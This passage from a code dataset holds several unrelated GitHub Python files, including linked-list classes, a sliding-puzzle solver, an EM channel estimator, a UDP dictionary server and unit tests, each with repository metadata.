cv2.imwrite(_output_filename, frame)\n\n # Release the camera\n cap.release()\n\n print(f\"Frame exported as {output_filename}\")\n\noutput_filename = \"output_image.jpg\" # Change this to the desired output filename\nexport_camera_frame(output_filename)\n","repo_name":"acsii-63/cloud-based","sub_path":"unit_demo/model/image.py","file_name":"image.py","file_ext":"py","file_size_in_byte":828,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"13468454687","text":"'''\nHomework 4 - Upsampling\nCoding part 2\n'''\nimport numpy as np\nimport os\nimport matplotlib.pyplot as plt\n\ndef from_text(filename):\n data = []\n label = []\n with open(filename, 'r') as infile:\n for line in infile.readlines():\n x, y, lb = line.split()\n data.append([float(x), float(y)])\n label.append([float(lb)])\n data = np.asarray(data)\n label = np.asarray(label)\n return data, label\n\nimport torch\nfrom torch.utils.data import Dataset, DataLoader\nimport PIL.Image as Image\n\n# import torchvision\n# from torchvision import models, transforms, utils\n\nclass ImbaDataset(Dataset):\n def __init__(self, root_path, mode='train'):\n self.meta = {'root_path': root_path,\n 'mode': mode}\n assert mode in ['train', 'test']\n if mode == 'train':\n data, label = from_text(os.path.join(root_path, 'samplestr.txt'))\n elif mode == 'test':\n data, label = from_text(os.path.join(root_path, 'sampleste.txt'))\n \n self.dataset = data \n self.label = label\n\n def __len__(self):\n return len(self.label)\n\n def __getitem__(self, index):\n return {'data': torch.from_numpy(self.dataset[index]),\n 'label': torch.from_numpy(self.label[index])}\n\ndef plot_dataset(data, label):\n true_mask = label.reshape((-1)).astype(bool)\n false_mask = (1-label).reshape((-1)).astype(bool)\n\n data_true = np.transpose(data[true_mask])\n data_false = np.transpose(data[false_mask])\n\n print('samples with positive class:', len(data_true[0]),\n '\\nsamples with negative class:', len(data_false[0]))\n\n plt.figure()\n plt.plot(data_true[0], data_true[1], '.b')\n plt.plot(data_false[0], data_false[1], '.r')\n\ndef draw_model(model):\n w = model.state_dict()['fc.weight']\n b = model.state_dict()['fc.bias']\n w1 = w[0,0].item()\n w2 = w[0,1].item()\n b1 = b[0].item()\n\n m = -w1/w2\n c = -b1/w2\n\n line_x = [ i/100 for i in range(-300, 700)]\n line_y = [ m*i + c for i in line_x]\n \n shade_x = [line_x[0], line_x[-1]]\n shade_y = [line_y[0], line_y[-1]]\n\n if w2 > 0:\n shade_y += [max(shade_y)]\n if m > 0:\n shade_x += [min(shade_x)]\n else:\n shade_x += [max(shade_x)]\n else:\n shade_y += [min(shade_y)]\n if m > 0:\n shade_x += [max(shade_x)]\n else:\n shade_x += [min(shade_x)]\n\n # plot_dataset(data_tr, label_tr)\n plt.plot(line_x, line_y, '.m', lw=1)\n# plt.line()\n plt.fill(shade_x, shade_y, '.c')","repo_name":"ghosalya/arti-intel","sub_path":"week4/hw4_code2.py","file_name":"hw4_code2.py","file_ext":"py","file_size_in_byte":2581,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"8223764376","text":"# Definition for singly-linked list.\n\n\nclass Node:\n def __init__(self, val=0, next=None):\n self.val = val\n self.next = next\n\nclass Solution:\n def reverseList(self, head: Node) -> Node:\n \n cur=head\n new=None\n \n while cur != None:\n temp=cur.next\n cur.next=new\n new=cur\n cur=temp\n \n return 
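        # Why draw_model above uses m = -w1/w2 and c = -b1/w2: the fc layer's
        # decision boundary is the line w1*x + w2*y + b1 = 0; solving for y
        # gives y = (-w1/w2)*x + (-b1/w2). A quick check with made-up weights:
        #
        #   w1, w2, b1 = 1.0, -2.0, 0.5
        #   m, c = -w1 / w2, -b1 / w2
        #   x0 = 3.0
        #   assert abs(w1 * x0 + w2 * (m * x0 + c) + b1) < 1e-12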
new\n\n\na=Solution()\n\n\n","repo_name":"cosmo9873/practice","sub_path":"linkedlist2.py","file_name":"linkedlist2.py","file_ext":"py","file_size_in_byte":413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"28950862584","text":"import unit\nimport game_board\nimport visualize\nimport time\n\ncc = unit.Cc(1, (0,1))\nz1 = unit.Zu(2, (4,0))\nz2 = unit.Zu(3, (4,3))\nz3 = unit.Zu(4, (3,1))\nz4 = unit.Zu(5, (3,2))\nmc = unit.Shu(6, (0,0))\nzy = unit.Shu(7, (0,3))\nzf = unit.Shu(8, (2,3))\nhz = unit.Shu(9, (2,0))\ngy = unit.Heng(10, (2,1))\n\n\nall_units = [cc, z1, z2, z3, z4, mc, zy, zf, hz, gy]\nnew_board = game_board.Board(all_units)\n\nvisited = {}\nqueue = []\nvisited[new_board.to_string().tobytes()] = True\nqueue.append(new_board) \nprint(\"start: \")\nprint(new_board.to_int())\nstart = time.time()\nfinal_board = game_board.BFS(queue, visited)\nend = time.time()\nprint(\"finished in \" + str(end-start))\nif final_board is None:\n print(\"Unsolvable\")\nelse:\n trace = []\n temp = final_board\n while temp.parent is not None:\n trace.append(temp)\n temp = temp.parent\n\ntrace = trace[::-1]\nvisualize.to_image(trace, \"./solutions/hengdaolima/\")\nvisualize.to_video(\"./solutions/hengdaolima/\", \"hengdao.mp4\")","repo_name":"HuaxuanGAO/HuaRongDao","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":972,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"74900917284","text":"from befunge.language import Instructions\nfrom befunge.core import Cell\n\nimport re\n\nclass Parser(object):\n def __init__(self, content):\n self.content = content \n\n def lex_char(self, c):\n kind = 'CHAR'\n\n for i, r in Instructions:\n match = r.search(c)\n\n if match:\n kind = i\n\n return {'kind': kind, 'value': c}\n \n def get_program(self):\n rows = []\n column = []\n for line in self.content.splitlines():\n for char in line:\n column.append(self.lex_char(char))\n\n rows.append(column)\n column = []\n \n return rows\n","repo_name":"jdiez17/befunge","sub_path":"befunge/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":662,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"12995996626","text":"import numpy as np \nimport matplotlib.pyplot as plt\n\nN = 512\nL = 4\nK = 4\n\nSYMBOLS = np.array([1+1j, -1+1j, 1-1j, -1-1j])\n\nn_sigma2 = 0.01\n\n# channel parameters\nc_sigma = 0.5 ** 0.5 \t\nlambda_ = 1\np = np.exp(-lambda_ * (np.arange(1,L+1) - 1)).reshape((L,1))\na = np.random.normal(0, c_sigma, (L,1))\nb = np.random.normal(0, c_sigma, (L,1))\nnorm_p = np.sum(p**2)\n# h0 is the true channel impulse response vector\nh0 = ((a + 1j*b)*p)/norm_p\t# h[k] = (a[k] + jb[k])p[k] / norm(p)\n\ndef plot_channel(hplot, label):\n\tplt.figure()\n\tplt.subplot(2,1,1)\n\tplt.title(label + ' Real and Imaginary')\n\tplt.grid(True)\n\tplt.stem([(hh[0]).real for hh in h0], linefmt='g-', markerfmt='go', label='Original', use_line_collection=True)\n\tplt.stem([(hh[0]).real for hh in hplot], linefmt='r:', markerfmt='ro', label=label, use_line_collection=True)\n\tplt.legend(loc='upper right')\n\tplt.subplot(2,1,2)\n\tplt.grid(True)\n\tplt.stem([(hh[0]).imag for hh in h0], linefmt='g-', markerfmt='go', label='Original', use_line_collection=True)\n\tplt.stem([(hh[0]).imag for hh in hplot], linefmt='r:', markerfmt='ro', label=label, use_line_collection=True)\n\tplt.legend(loc='upper right')\n\n\n# Fourier Matrix\nF = 
np.array([ [ np.exp((np.pi*2j*i*j)/N) for j in range(L)] for i in range(N)])\nFH = F.conjugate().T\n\ndef P_gaussian(y, h, x, sigma2, beta):\n\tN = y.size\n\tdist2 = np.abs((x*(F.dot(h)) - y)).reshape(N)**2\n\tval = ((1/(2*np.pi*sigma2)**0.5)*np.exp(-dist2/2/sigma2))**beta\n\treturn val\n\ndef likelihood(y, h, nus, sigma2, K, beta):\n\tll = 0\n\tfor k in range(K):\n\t\tll += (nus[k]**beta)*P_gaussian(y, h, SYMBOLS[k], sigma2, beta)\n\treturn ll\n\n\n\ndef solve(y, K, L, betas=[0.6, 0.8, 1], c_sigma_est=1, lambda_est=0, thresh=1e-10, max_steps=5000, tolerance_history_thresh=1e-2, history_length=50):\n\n\tN = y.size\n\tnu_est = np.array([1./K for j in range(K)])\n\tp = np.exp(-lambda_est * (np.arange(1,L+1) - 1)).reshape((L,1))\n\ta = np.random.normal(0, c_sigma_est, (L,1))\n\tb = np.random.normal(0, c_sigma_est, (L,1))\n\n\t# initialization\n\th_est = ((a + 1j*b)*p)/(np.sum(p**2))\n\n\tsigma2_est = np.sum(np.abs(y)**2)/N\n\tprint('init', sigma2_est)\n\n\tlikelihoods = []; beta_step = []; steps = 0;\n\th_ests = [h_est.copy()]\n\n\tactual_likelihood = np.sum(np.log(likelihood(y, h0, np.array([0.25, 0.25, 0.25, 0.25]) , n_sigma2, K, 1) + 1e-11))/N\n\tlikelihoods.append(np.sum(np.log(likelihood(y, h_est, nu_est, sigma2_est, K, 1) + 1e-11))/N)\n\t\n\tfor beta in betas:\n\t\tprint('Maximization for beta = {}'.format(beta))\n\n\t\tif beta!=1:\n\t\t\th_est += 1*np.random.randn(L,1)\n\n\t\tllh_01 = likelihood(y, h_est, nu_est, sigma2_est, K, 1)\n\t\tllh_1 = likelihood(y, h_est, nu_est, sigma2_est, K, beta)\n\n\t\t# define h[k, i] = probability that xi belongs to class k\n\t\t# however, the following is being done for numerical stability\n\t\tq = np.array([(nu_est[k]**beta)*P_gaussian(y, h_est, SYMBOLS[k], sigma2_est, beta)/(llh_1+1e-9) for k in range(K-1)])\n\t\tq = np.append(q, [(1 - np.sum(q, axis=0))], axis=0)\n\t\t\n\t\ttolerance_history = np.ones(history_length)\n\t\tll_history = np.ones(history_length)\n\n\t\tif beta == 1:\n\t\t\tthresh = 1e-10\n\t\t\ttolerance_history_thresh = 1e-7\n\n\t\twhile tolerance_history[-1] >= thresh and steps <= max_steps:\n\t\t\tsteps += 1\n\t\t\tprint(\"Step {}\".format(steps), end='\\r')\n\t\t\tllh_00 = llh_01.copy()\n\t\t\tllh_0 = llh_1.copy()\n\n\t\t\ttemp = np.zeros((N,1), dtype=np.complex128)\n\t\t\ttemp1 = np.zeros((N,1), dtype=np.complex128)\n\t\t\tfor k in range(K):\n\t\t\t\ttemp += np.conjugate(SYMBOLS[k])*y*(q[k].reshape((N, 1)))\n\t\t\t\ttemp1 += (np.abs(SYMBOLS[k])**2)*(q[k].reshape((N,1)) + 1e-9)\n\t\t\t\tnu_est[k] = np.sum(q[k])/N\n\n\t\t\t# print('temp', temp)\n\t\t\t# print('temp1', temp1)\n\n\t\t\tmat = np.linalg.inv(FH.dot(np.diag(temp1.reshape(N)).dot(F)))\n\t\t\th_est = mat.dot(FH.dot(temp))\n\n\t\t\tfor k in range(K):\n\t\t\t\tsigma2_est += np.sum((np.abs(SYMBOLS[k]*F.dot(h_est)-y)**2)*q[k].reshape((N,1)))\n\t\t\tsigma2_est /= N\n\n\t\t\tllh_01 = likelihood(y, h_est, nu_est, sigma2_est, K, 1)\n\t\t\tllh_1 = likelihood(y, h_est, nu_est, sigma2_est, K, beta)\n\n\t\t\tif np.max(tolerance_history) <= tolerance_history_thresh:\n\t\t\t\th_est += 1*np.random.randn(L,1)\n\n\t\t\t# The following is being done for numerical stability\n\t\t\tq = np.array([(nu_est[k]**beta)*P_gaussian(y, h_est, SYMBOLS[k], sigma2_est, beta)/(llh_1+1e-9) for k in range(K-1)])\n\t\t\tq = np.append(q, [(1 - np.sum(q, axis=0))], axis=0)\n\n\t\t\tlog_ll0 = np.log(llh_00 + 1e-11)\n\t\t\tlog_ll1 = np.log(llh_01 + 1e-11)\n\t\t\ttolerance = np.abs(((log_ll0-log_ll1)/log_ll1))\n\t\t\ttolerance_history = np.append(tolerance_history[1:], 
[np.max(tolerance)])\n\n\t\t\tlikelihoods.append(np.sum(log_ll1)/N) \n\t\t\tll_history = np.append(ll_history[1:], [likelihoods[-1]-likelihoods[-2]])\n\n\t\t\t# if oscillations take place\n\t\t\tif np.where(ll_history < 0)[0].size >= 33 and ll_history[-1]>0:\n\t\t\t\tif beta != 1:\n\t\t\t\t\tprint('ll break')\n\t\t\t\t\tbreak\n\t\t\t\telse:\n\t\t\t\t\th_est += 1e-3*np.random.randn(L,1)\n\t\t\th_ests.append(h_est.copy())\n\n\t\tprint(\"Steps {} \".format(steps))\n\t\tbeta_step.append((beta, steps-1))\n\t\t# print('Beta: {} --- alpha_est: {}, mu_est: {}, sigma_est: {}'.format(beta, alpha_ests, mu_est, sigma_est))\n\treturn h_ests, sigma2_est, nu_est, beta_step, likelihoods, actual_likelihood\n\nX = np.array([SYMBOLS[int(np.random.rand()*K)] for i in range(N)]).reshape((N,1))\ny = X*(F.dot(h0)) + (0.5**0.5)*(np.random.normal(0, n_sigma2**0.5, (N,1)) + 1j*np.random.normal(0, n_sigma2**0.5, (N,1))) # process noise\n\n\nh_ests, sigma2_est, nu_est, beta_step, likelihoods, actual_likelihood = solve(y, K, L)\nprint('sigma2_est', sigma2_est)\nprint('nu_est', nu_est)\nprint('h_est', h_ests[-1])\n\nplt.figure('Y')\nplt.title('Y')\nplt.plot(np.real(y), np.imag(y), 'b.', label='Y')\nplt.plot(np.real(X), np.imag(X), 'ro', label='X')\nZ = y/(F.dot(h0))\nplt.plot(np.real(Z), np.imag(Z), 'g.', label='Z')\nplt.grid(True)\nplt.legend(loc='upper right')\n\n\n\nplt.figure('Likelihood')\nplt.title(r'Likelihoods vs. Iterations, ')#$(\\mu_1,\\mu_2)=($'+str(-mu_iter)+','+str(mu_iter)+')')\nplt.plot(likelihoods)\nplt.plot(np.repeat(actual_likelihood,len(likelihoods)), label='Actual')\t\nplt.grid(True)\n\nplot_channel(h_ests[-1], 'Est')\n\nplt.show()\n","repo_name":"2vrk1504/EstimationTheory_EE5111","sub_path":"Project/blind.py","file_name":"blind.py","file_ext":"py","file_size_in_byte":5983,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"26552149319","text":"from typing import Final\nfrom unittest import TestCase, main\n\nfrom day_01 import parse_sorted_sums, part_1, part_2\n\n\nclass TestDay01(TestCase):\n _RAW_INPUT: Final[str] = '''1000\n2000\n3000\n\n4000\n\n5000\n6000\n\n7000\n8000\n9000\n\n10000'''\n _sorted_sums: list[int]\n\n def setUp(self):\n self._sorted_sums = parse_sorted_sums(self._RAW_INPUT)\n\n def test_parse_sorted_sums(self):\n self.assertListEqual(self._sorted_sums, [4_000, 6_000, 10_000, 11_000, 24_000])\n\n def test_part_1(self):\n self.assertEqual(part_1(self._sorted_sums), 24_000)\n\n def test_part_2(self):\n self.assertEqual(part_2(self._sorted_sums), 45_000)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"rubennoriegamier/aoc_2022","sub_path":"day_01_test.py","file_name":"day_01_test.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"26896095497","text":"import socket\r\nfrom threading import Thread\r\nimport os\r\nimport pickle\r\nMAX_BYTES = 65535\r\ndict = {}\r\nsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\r\nsock.bind(('127.0.0.1', 1080))\r\nprint('Listening at {}'.format(sock.getsockname()))\r\nwhile True:\r\n data, address = sock.recvfrom(MAX_BYTES)\r\n text = data.decode('utf-8')\r\n if text == \"editar\":\r\n with open('book.pickle','rb') as f:\r\n data = pickle.load(f)\r\n print(data)\r\n dat = [*data]\r\n dat = sorted(dat)\r\n print(dat)\r\n dato = \" \".join(dat)\r\n sock.sendto(dato.encode('utf-8'),address)\r\n j=1\r\n while j==1:\r\n newdata, address = sock.recvfrom(MAX_BYTES)\r\n newdat = 
newdata.decode('utf-8')\r\n print(newdat)\r\n\r\n if newdat in dat:\r\n prdat = newdat\r\n sendNow = \" \".join(data[newdat])\r\n sock.sendto(sendNow.encode('utf-8'),address)\r\n elif newdat == 'sair':\r\n j=2\r\n else:\r\n with open(\"book.pickle\", \"wb\") as f:\r\n newdat = newdat.split(\" \")\r\n if newdat[0] == '':\r\n data.pop(prdat)\r\n pickle.dump(data, f)\r\n dat = [*data]\r\n dat = sorted(dat)\r\n dato = \" \".join(dat)\r\n sock.sendto(dato.encode('utf-8'), address)\r\n else:\r\n popped = data.pop(prdat)\r\n data[newdat[0]] = newdat[1:5]\r\n pickle.dump(data,f)\r\n print(data)\r\n dat = [*data]\r\n dat = sorted(dat)\r\n dato = \" \".join(dat)\r\n sock.sendto(dato.encode('utf-8'), address)\r\n if text == \"adicionar\":\r\n data,address = sock.recvfrom(MAX_BYTES)\r\n data = data.decode('utf-8')\r\n with open(\"book.pickle\",\"rb\") as f:\r\n dici = pickle.load(f)\r\n with open(\"book.pickle\", \"wb\") as f:\r\n dat = data.split(\" \")\r\n dici[dat[0]] = dat[1:5]\r\n pickle.dump(dici,f)\r\n print(dici)\r\n if text == \"consultar\":\r\n with open(\"book.pickle\",\"rb\") as f:\r\n dic = pickle.load(f)\r\n data = [*dic]\r\n dat = \" \".join(data)\r\n sock.sendto(dat.encode('utf-8'),address)\r\n print(dic)\r\n j=1\r\n while j==1:\r\n word, address = sock.recvfrom(MAX_BYTES)\r\n word = word.decode('utf-8')\r\n print(word)\r\n if word in [*dic]:\r\n data = dic[word]\r\n print(dic[word])\r\n data = \" \".join(data)\r\n data = data.encode('utf-8')\r\n sock.sendto(data,address)\r\n elif word == \"sair\":\r\n j=2\r\n","repo_name":"otavioalbucosta/DicionarioColaborativoPython","sub_path":"Dicionário/CouchPotato.py","file_name":"CouchPotato.py","file_ext":"py","file_size_in_byte":3116,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"73373932326","text":"#\n# @Author: Bhaskar S\n# @Blog: https: // www.polarsparc.com\n# @Date: 04 Jul 2020\n#\n\nimport CustomerAccount_pb2\n\naccount = CustomerAccount_pb2.Account()\naccount.acct_no = \"12345\"\naccount.acct_type = CustomerAccount_pb2.CA_BROKERAGE\naccount.customer.first_name = \"Bugs\"\naccount.customer.last_name = \"Bunny\"\naccount.customer.email_id = \"bugs.b@carrot.co\"\naccount.customer.phone_no.append(\"100-100-1000\")\naccount.customer.phone_no.append(\"100-100-1005\")\n\nprint(\"Account fields: %s\" % account.ListFields())\nprint(\"Account data size: %s\" % account.ByteSize())\nprint(\"Account: %s\" % account)\n\ndata = account.SerializeToString()\n\naccount2 = CustomerAccount_pb2.Account()\naccount2.ParseFromString(data)\n\nprint(\"Account deserialized: %s\" % account2)\n","repo_name":"bhaskars-repo/PyProtobuf3","sub_path":"CustomerAccountTest.py","file_name":"CustomerAccountTest.py","file_ext":"py","file_size_in_byte":745,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"30398978439","text":"class Node:\n \n def __init__(self, value):\n self.data = value\n self.next_data = None\n\nclass Linked_List:\n\n def __init__(self, *args):\n self.__head = None\n self.__tail = None\n self.__length = 0 \n self.__iterator = None\n if args != ():\n for i in args:\n self.append(i)\n\n def __repr__(self):\n display = \"[\"\n x = self.__head\n while x:\n if x.next_data is not None:\n display += str(x.data) + \", \"\n else:\n display += str(x.data)\n x = x.next_data\n return display + \"]\"\n \n\n def __len__(self):\n return self.__length\n\n def __getitem__(self, index):\n if isinstance(index, int):\n index = 
self.__neg_index_chk(index)\n \n if index < self.__length:\n x = self.__head\n i = 0\n while x:\n if i == index:\n return x.data\n x = x.next_data\n i += 1\n else:\n raise IndexError(\"index Out of range\")\n\n if isinstance(index, slice):\n obj = Linked_List()\n\n if index.start == None and index.stop == None and index.step == None:\n return self.copy()\n\n if index.start == None and index.stop != None:\n if index.step != None:\n for i in range(0, index.stop, index.step):\n obj.append(self[i])\n return obj\n else:\n for i in range(0, index.stop):\n obj.append(self[i])\n return obj\n\n if index.stop == None and index.start != None:\n if index.step != None:\n for i in range(index.start, self.__length, index.step):\n obj.append(self[i])\n return obj\n else:\n for i in range(index.start, self.__length):\n obj.append(self[i])\n return obj\n\n if index.start != None and index.stop != None:\n if index.step != None:\n for i in range(index.start, index.stop, index.step):\n obj.append(self[i])\n return obj\n else:\n for i in range(index.start, index.stop):\n obj.append(self[i])\n return obj\n\n if index.step != None and index.start == None and index.stop == None:\n for i in range(0, self.__length, index.step):\n obj.append(self[i])\n return obj\n\n def __setitem__(self, index, data):\n self.__insert(index, data, \"setitem\")\n\n def __delitem__(self, index):\n self.pop(index)\n\n def __add__(self, other):\n flag = False\n try:\n getattr(other, \"__iter__\")\n lst = Linked_List()\n for i in self:\n lst.append(i)\n for i in other:\n lst.append(i)\n return lst\n except:\n flag = True\n if flag:\n raise Exception(f\"can not add list and object of type {type(other)}\")\n\n def __iter__(self):\n self.__iterator = self.__head\n return self\n\n def __next__(self):\n if self.__iterator == None:\n self.__iterator = self.__head\n raise StopIteration\n current_val = self.__iterator.data\n self.__iterator = self.__iterator.next_data\n return current_val\n\n def __insert_first(self, data):\n x = Node(data)\n if self.__tail == None and self.__head == None:\n self.__tail = x\n self.__head = x\n self.__iterator = x\n else:\n temp = self.__head\n self.__head = x\n self.__head.next_data = temp\n self.__iterator = self.__head\n self.__length += 1\n\n def __insert(self, index, data, flag):\n if not isinstance(index, int):\n raise TypeError(\"list indexes must be inetgers\")\n \n if index < self.__length:\n if index < 0:\n index = self.__neg_index_chk(index)\n i = 0\n x = self.__head\n if flag == \"insert\":\n if index == 0:\n self.__insert_first(data)\n else:\n node = Node(data)\n while x:\n if i == index - 1:\n node.next_data = x.next_data\n x.next_data = node\n self.__length += 1\n break\n x = x.next_data\n i += 1\n elif flag == \"setitem\":\n while x:\n if i == index:\n x.data = data\n break\n x = x.next_data\n i += 1\n else:\n raise IndexError(\"index Out of range\")\n\n def __neg_index_chk(self, index):\n if index < 0:\n index = abs(index)\n if index <= self.__length:\n index = self.__length - index\n else:\n raise IndexError(\"list index out of range\")\n return index\n return index\n\n def append(self, data):\n x = Node(data)\n if self.__tail == None and self.__head == None:\n self.__tail = x\n self.__head = x\n self.__iterator = x\n else:\n self.__tail.next_data = x\n self.__tail = x\n self.__length += 1\n\n def insert(self, index, data):\n self.__insert(index, data, \"insert\")\n\n def extend(self, data):\n flag = False\n try:\n getattr(data, \"__iter__\")\n for i in data:\n self.append(i)\n except:\n flag = 
True\n        if flag:\n            raise Exception(f\"can not extend list with object of type {type(data)}\")\n\n    def copy(self):\n        lst = Linked_List()\n        for i in self:\n            lst.append(i)\n        return lst\n\n    def reverse(self):\n        lst = Linked_List()\n        self.__reverse(self.__head, lst)\n        return lst\n\n    def __reverse(self, x, lst):\n        if x:\n            self.__reverse(x.next_data, lst)\n            lst.append(x.data)\n            return x\n\n    def remove(self, data):\n        x = self.__head\n        if self.__head == None and self.__tail == None:\n            raise Exception(\"can not remove items from an empty list\")\n        elif self.__head == self.__tail and x.data == data:\n            self.__head = None\n            self.__tail = None\n            self.__iterator = None\n        elif x.data == data:\n            self.__head = x.next_data\n        else:\n            flag = False\n            while x:\n                if x.next_data.data == data:\n                    x.next_data = x.next_data.next_data\n                    flag = True\n                    break\n                x = x.next_data\n            if not flag:\n                raise TypeError(f\"value {data} not found\")\n        self.__length -= 1\n\n    def pop(self, index = None):\n        if index is not None and not isinstance(index, int):\n            raise TypeError(\"list indexes must be integers\")\n        elif isinstance(index, int) and index > self.__length:\n            raise IndexError(\"list index out of range\")\n        elif self.__head == None and self.__tail == None:\n            raise Exception(\"can not pop items from an empty list\")\n        elif self.__head == self.__tail:\n            data = self.__head.data\n            self.__head = None\n            self.__tail = None\n            self.__iterator = None\n            self.__length -= 1\n            return data\n        else:\n            x = self.__head\n            if index is None:\n                while x:\n                    if x.next_data.next_data == None:\n                        data = x.next_data.data\n                        x.next_data = None\n                        self.__tail = x\n                        self.__length -= 1\n                        return data\n                    x = x.next_data\n            else:\n                index = self.__neg_index_chk(index)\n                i = 0\n                if index == i:\n                    data = self.__head.data\n                    self.__head = self.__head.next_data\n                    self.__length -= 1\n                    return data\n                while x:\n                    if i == index - 1:\n                        data = x.next_data.data\n                        x.next_data = x.next_data.next_data\n                        self.__length -= 1\n                        return data\n                    i += 1\n                    x = x.next_data\n\n    def clear(self):\n        self.__head = None\n        self.__tail = None\n        self.__iterator = None\n        self.__length = 0\n\n    def count(self, data):\n        ct = 0\n        for i in self:\n            if i == data:\n                ct += 1\n        return ct\n\n    def index(self, data):\n        index = 0\n        for i in self:\n            if i == data:\n                return index\n            index += 1\n        raise TypeError(\"value not found\")\n\n    def sort(self):\n        lst = Linked_List()\n        for i in sorted(self):\n            lst.append(i)\n        return lst\n\n\nif __name__ == \"__main__\":\n    lst = Linked_List(1,99,5,6)\n    x = lst + (7,8,48,45)\n    print(x)\n    print(x[:])\n","repo_name":"farooq98/linked-list-python","sub_path":"Linked List Python.py","file_name":"Linked List Python.py","file_ext":"py","file_size_in_byte":9568,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"}
{"seq_id":"70948965606","text":"import unittest\n\nfrom .code_node import LiteralNode\nfrom .code_node import SequenceNode\nfrom .code_node import SymbolNode\nfrom .code_node import SymbolScopeNode\nfrom .code_node import TextNode\nfrom .mako_renderer import MakoRenderer\n\n\nclass CodeNodeTest(unittest.TestCase):\n    def render(self, node):\n        prev = \"\"\n        current = str(node)\n        while current != prev:\n            prev = current\n            current = str(node)\n        return current\n\n    def assertRenderResult(self, node, expected):\n        def simplify(s):\n            return \" \".join(s.split())\n\n        actual = simplify(self.render(node))\n        expected = simplify(expected)\n\n        self.assertEqual(actual, expected)\n\n    def test_literal_node(self):\n        \"\"\"\n        Tests that, in LiteralNode, the special characters of template 
(%, ${},\n etc) are not processed.\n \"\"\"\n renderer = MakoRenderer()\n root = LiteralNode(\"<% x = 42 %>${x}\", renderer=renderer)\n self.assertRenderResult(root, \"<% x = 42 %>${x}\")\n\n def test_empty_literal_node(self):\n renderer = MakoRenderer()\n root = LiteralNode(\"\", renderer=renderer)\n self.assertRenderResult(root, \"\")\n\n def test_text_node(self):\n \"\"\"Tests that the template language works in TextNode.\"\"\"\n renderer = MakoRenderer()\n root = TextNode(\"<% x = 42 %>${x}\", renderer=renderer)\n self.assertRenderResult(root, \"42\")\n\n def test_empty_text_node(self):\n renderer = MakoRenderer()\n root = TextNode(\"\", renderer=renderer)\n self.assertRenderResult(root, \"\")\n\n def test_list_operations_of_sequence_node(self):\n \"\"\"\n Tests that list operations (insert, append, and extend) of SequenceNode\n work just same as Python built-in list.\n \"\"\"\n renderer = MakoRenderer()\n root = SequenceNode(renderer=renderer)\n root.extend([\n LiteralNode(\"2\"),\n LiteralNode(\"4\"),\n ])\n root.insert(1, LiteralNode(\"3\"))\n root.insert(0, LiteralNode(\"1\"))\n root.insert(100, LiteralNode(\"5\"))\n root.append(LiteralNode(\"6\"))\n self.assertRenderResult(root, \"1 2 3 4 5 6\")\n\n def test_nested_sequence(self):\n \"\"\"Tests nested SequenceNodes.\"\"\"\n renderer = MakoRenderer()\n root = SequenceNode(renderer=renderer)\n nested = SequenceNode()\n nested.extend([\n LiteralNode(\"2\"),\n LiteralNode(\"3\"),\n LiteralNode(\"4\"),\n ])\n root.extend([\n LiteralNode(\"1\"),\n nested,\n LiteralNode(\"5\"),\n ])\n self.assertRenderResult(root, \"1 2 3 4 5\")\n\n def test_symbol_definition_chains(self):\n \"\"\"\n Tests that use of SymbolNode inserts necessary SymbolDefinitionNode\n appropriately.\n \"\"\"\n renderer = MakoRenderer()\n root = SymbolScopeNode(renderer=renderer)\n\n root.register_code_symbols([\n SymbolNode(\"var1\", \"int ${var1} = ${var2} + ${var3};\"),\n SymbolNode(\"var2\", \"int ${var2} = ${var5};\"),\n SymbolNode(\"var3\", \"int ${var3} = ${var4};\"),\n SymbolNode(\"var4\", \"int ${var4} = 1;\"),\n SymbolNode(\"var5\", \"int ${var5} = 2;\"),\n ])\n\n root.append(TextNode(\"(void)${var1};\"))\n\n self.assertRenderResult(\n root, \"\"\"\nint var5 = 2;\nint var4 = 1;\nint var3 = var4;\nint var2 = var5;\nint var1 = var2 + var3;\n(void)var1;\n \"\"\")\n","repo_name":"TrellixVulnTeam/chromium_82SC","sub_path":"third_party/blink/renderer/bindings/scripts/bind_gen/code_node_test.py","file_name":"code_node_test.py","file_ext":"py","file_size_in_byte":3479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"14404399751","text":"def solution(s):\n num_dic = {\"zero\": \"0\",\n \"one\": \"1\",\n \"two\": \"2\",\n \"three\": \"3\",\n \"four\": \"4\",\n \"five\": \"5\",\n \"six\": \"6\",\n \"seven\": \"7\",\n \"eight\": \"8\",\n \"nine\": \"9\"}\n for word in num_dic:\n s = s.replace(word, num_dic[word])\n return int(s)\n\n\nprint(solution(\"one4seveneight\"))","repo_name":"Ohjinn/algo-py","sub_path":"programmers/level1/숫자_문자열과_영단어.py","file_name":"숫자_문자열과_영단어.py","file_ext":"py","file_size_in_byte":418,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"71381316965","text":"import sys\nimport os\nbase_dir = os.path.join(os.path.dirname(os.path.abspath(__file__)), '../../')\nsys.path.append(base_dir)\nsys.path.append(os.path.join(base_dir, 'rl'))\n\nimport time\nfrom collections import deque\n\nimport numpy as np\nimport torch\nimport torch.nn 
